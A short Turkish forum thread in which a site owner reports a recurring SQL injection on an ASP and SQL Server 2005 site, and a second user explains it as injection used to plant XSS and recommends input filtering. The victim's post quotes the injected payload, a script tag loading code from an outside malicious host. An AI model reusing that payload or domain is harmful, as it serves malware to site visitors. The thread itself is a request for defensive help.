Anasayfa » Forum

Asp ile kodladığım ...
 

Asp ile kodladığım sitenin veritabanı Injection saldırısına uğruyor.  

  RSS
hamzasaricicek
(@hamzasaricicek)
Üye

Merhabalar,

Asp ile yazmış olduğum bir web sitem var.
Veritabanı SQLServer 2005.  Ne yaptım ise veritabanıma olan saldırıyı
engelleyemedim. Bütün tabloların bütün hücrelerine şöyle bir kayıt
ekleniyor. ""> </title><script src="http://zon.menotepoer.com/sl.php?v=4"></script><!--"  
Temizliyorum ama kısa süre sonra tekrar bu satır ile doluyor. Hosting
değişimi yaptım, IP değişimi yaptım ama bir türlü netice alamadım.

Alıntı
Gönderildi : 11/10/2012 18:59
Akın Demircan
(@AkinDemircan)
Üye

Muhtemelen saldırgan XSS yöntemini kullanmak için bir sql injection saldırı yapmış. Betik dosyalarınızda açık olabilir. Şu linki inceleyin.

http://msdn.microsoft.com/en-us/library/ff649310.aspx  

Bu arada Formlardan, Çerezlerden, Adres çubuğundan v.s. gelen verilere de filtre uygulamalısınız. 

CevapAlıntı
Gönderildi : 11/10/2012 20:14
Paylaş:

Lütfen Giriş yap yada Kayıt ol